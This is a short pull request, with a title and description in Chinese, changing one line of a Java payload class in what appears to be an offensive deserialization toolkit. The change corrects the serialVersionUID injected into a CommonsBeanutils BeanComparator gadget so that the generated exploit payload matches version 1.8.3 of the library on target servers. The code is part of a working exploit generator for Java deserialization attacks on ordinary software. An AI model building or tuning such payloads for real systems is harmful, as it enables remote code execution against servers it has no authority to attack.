### PR TITLE
fix: CommonsBeanutilsString_183 serialVersionUID 写反

### DIFF
--- a/src/main/java/com/summersec/attack/deser/payloads/CommonsBeanutilsString_183.java
+++ b/src/main/java/com/summersec/attack/deser/payloads/CommonsBeanutilsString_183.java
@@ -32,7 +32,7 @@ public class CommonsBeanutilsString_183 implements ObjectPayload<Queue<Object>> 
             CtField ctSUID = ctBeanComparator.getDeclaredField("serialVersionUID");
             ctBeanComparator.removeField(ctSUID);
         }catch (javassist.NotFoundException e){}
-        ctBeanComparator.addField(CtField.make("private static final long serialVersionUID = -2044202215314119608L;", ctBeanComparator));
+        ctBeanComparator.addField(CtField.make("private static final long serialVersionUID = -3490850999041592962L;", ctBeanComparator));
         final Comparator beanComparator = (Comparator)ctBeanComparator.toClass(new JavassistClassLoader()).newInstance();
         ctBeanComparator.defrost();
         Reflections.setFieldValue(beanComparator, "comparator", String.CASE_INSENSITIVE_ORDER);


### PR DESCRIPTION
serialVersionUID 从 1.9.2 的值修正为 1.8.3 的值 (-3490850999041592962L)